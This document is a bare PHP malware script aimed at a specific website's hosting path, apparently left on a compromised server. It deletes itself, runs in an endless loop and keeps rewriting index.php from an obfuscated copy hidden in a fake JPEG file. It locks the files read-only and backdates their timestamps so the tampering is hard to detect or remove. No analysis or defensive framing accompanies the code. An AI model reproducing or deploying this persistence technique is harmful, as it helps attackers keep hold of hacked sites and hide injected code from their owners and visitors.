<?php 

error_reporting(0);
set_time_limit(0);
ignore_user_abort(true);

$path = "/home/onlyhtml_s/shreeagrasenmatrimonial.com/";
$path = str_replace("\\", "/", $path);
$do = rtrim($path,"/") . "/";

@unlink(__FILE__);
while (true) {
    usleep(1000000 * 0.1);
        try {

        $ruzhu_php_jm = "";
        $fengexian = base64_decode("fHstLi0hISF9fA");
        $index_path = $do . "index.php";
        $fp_old_index = @file_get_contents($do . "index.php");

        $wp_head_path = $do . "wp-blog-header.php";
        $wp_blog_header = @file_get_contents($wp_head_path);
        $is_wp = (file_exists($wp_head_path) and (substr_count($wp_blog_header, "WordPress") > 0)) ? true : false;

        if ($is_wp) {
            $index_new_con = base64_decode($ruzhu_php_jm) . base64_decode("PD9waHAgZGVmaW5lKCAnV1BfVVNFX1RIRU1FUycsIHRydWUgKTsgcmVxdWlyZSgnLi93cC1ibG9nLWhlYWRlci5waHAnKTs/Pg");
        } else {
            $index_new_con = base64_decode($ruzhu_php_jm) . trim($fp_old_index);
        }

        $new_img = $do . "images";
        @mkdir($new_img);
        @chmod($new_img, 0755);
        $cache_jpg = $new_img . "/toggige-arrow.jpg";
        $index_cache_jpg = @file_get_contents($cache_jpg);

        $ex_jpg = explode($fengexian, $index_cache_jpg);
        $r_index_jpg_con = base64_decode(str_rot13($ex_jpg[1]));

        if (file_exists($cache_jpg)) {

            if ($ex_jpg[0] === md5($ex_jpg[1])) {

                if (md5($r_index_jpg_con) !== md5($fp_old_index)) {
                    @chmod($index_path, 0644);
                    @unlink($index_path);

                    $ok = @file_put_contents($index_path, $r_index_jpg_con) ? "1" : "0";
                    @touch($index_path, filectime($index_path));
                    @chmod($index_path, 0444);
                }

            } else {

                $str13 = str_rot13(base64_encode($index_new_con));
                $cache_jpg_con = md5($str13) . $fengexian . $str13;

                @file_put_contents($cache_jpg, $cache_jpg_con);
                @touch($cache_jpg, filectime($index_path));
                @chmod($cache_jpg, 0444);
                if (md5($r_index_jpg_con) !== md5($fp_old_index)) {
                    @chmod($index_path, 0644);
                    @unlink($index_path);
                    $ok = @file_put_contents($index_path, $index_new_con) ? "1" : "0";
                    @touch($index_path, filectime($index_path));
                    @chmod($index_path, 0444);
                }

            }

        } else {

            $str13 = str_rot13(base64_encode($index_new_con));
            $cache_jpg_con = md5($str13) . $fengexian . $str13;

            @file_put_contents($cache_jpg, $cache_jpg_con);
            @touch($cache_jpg, filectime($index_path));
            @chmod($cache_jpg, 0444);

            @chmod($index_path, 0644);
            @unlink($index_path);

            $ok = @file_put_contents($index_path, $index_new_con) ? "1" : "0";
            @touch($index_path, filectime($index_path));
            @chmod($index_path, 0444);

        }

    } catch (Exception $e) {
    }


}

 ?>